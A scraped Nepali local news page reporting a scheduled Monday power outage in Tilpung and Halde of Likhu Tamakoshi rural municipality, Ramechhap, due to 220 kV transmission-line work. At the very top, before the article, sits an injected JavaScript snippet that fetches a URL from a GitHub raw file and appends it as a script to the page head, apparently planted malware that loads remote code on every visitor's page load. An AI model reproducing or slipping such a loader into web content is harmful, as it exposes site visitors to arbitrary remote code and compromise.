;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज लिखु तामाकोशी गाउँपालिकाको तिल्पुङ्ग् र हल्देमा बत्ती नआउने – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • आज लिखु तामाकोशी गाउँपालिकाको तिल्पुङ्ग् र हल्देमा बत्ती नआउने
रामेछाप बिशेष

आज लिखु तामाकोशी गाउँपालिकाको तिल्पुङ्ग् र हल्देमा बत्ती नआउने

असोज १२,

रामेछाप । रामेछापको लिखु तामाकोशी गाउँपालिकाका दुई स्थानमा आज (सोमबार) बिजुली बत्ती नआउने भएको छ ।

नेपाल बिधुत प्रधिकरणले रामेछापले दिएको जानकारी अनुसार लिखु तामाकोशी गाउँपालिकाको तिल्पुङ्ग् र हल्दे  क्षेत्रमा बिजुली बत्ति आपूर्ती नहुने भएको हो ।

सो स्थानमा सोमबार बिहान ८ बजेदेखि साँझ ५ बजेसम्म बिजुली बत्ती अबरुद्ध हुने भएको हो । खिम्ती ढल्केबरको २२० केभी प्रशारण लाइन आयोजना कार्यान्वयनको लागि प्रशानरण लाईगको तार तान्ने काम गर्नु पर्ने भएकाले बत्ति नआउने भएको हो ।

No description available.

फेसबुक प्रतिक्रियाहरु